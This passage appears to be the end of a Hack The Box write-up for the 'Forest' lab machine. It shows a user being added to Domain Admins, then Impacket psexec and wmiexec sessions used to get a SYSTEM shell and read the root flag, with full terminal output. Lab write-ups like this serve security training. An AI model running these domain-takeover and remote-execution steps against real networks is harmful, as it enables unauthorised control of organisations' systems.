We include our user u505 into the Domain Admins group. At this point we could grab the root flag.
C:\Windows\system32>net group "Domain Admins" /add u505 The command completed successfully.
C:\Windows\system32>net group "Domain Admins" Group name Domain Admins Comment Designated administrators of the domain
Members
------------------------------------------------------------------------------- Administrator u505 The command completed successfully.
C:\Windows\system32>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on 10.10.10.161..... [*] Stopping service KPmZ..... [*] Removing service KPmZ..... [*] Removing file SgKAtGFA.exe.....
Root flag
psexec
We can use psexec to connect and grab the root flag.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/psexec.py u505@10.10.10.161 Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation
Password: [*] Requesting shares on 10.10.10.161..... [*] Found writable share ADMIN$ [*] Uploading file zsxDuvFg.exe [*] Opening SVCManager on 10.10.10.161..... [*] Creating service OzJU on 10.10.10.161..... [*] Starting service OzJU..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt <ROOT_FLAG> C:\Windows\system32>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on 10.10.10.161..... [*] Stopping service OzJU..... [*] Removing service OzJU..... [*] Removing file zsxDuvFg.exe.....
wmiexec
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/wmiexec.py u505@10.10.10.161 Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation
Password: [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami htb\u505
C:\>type C:\Users\Administrator\Desktop\root.txt <ROOT_FLAG> C:\>exit
References
- Domain Enumeration + Exploitation
- PowerView-3.0 tips and tricks
- winPEAS
- https://github.com/BloodHoundAD/BloodHound
- BloodHound with Kali Linux: 101
- https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators
Daniel Simao 23:32, 4 April 2020 (EDT)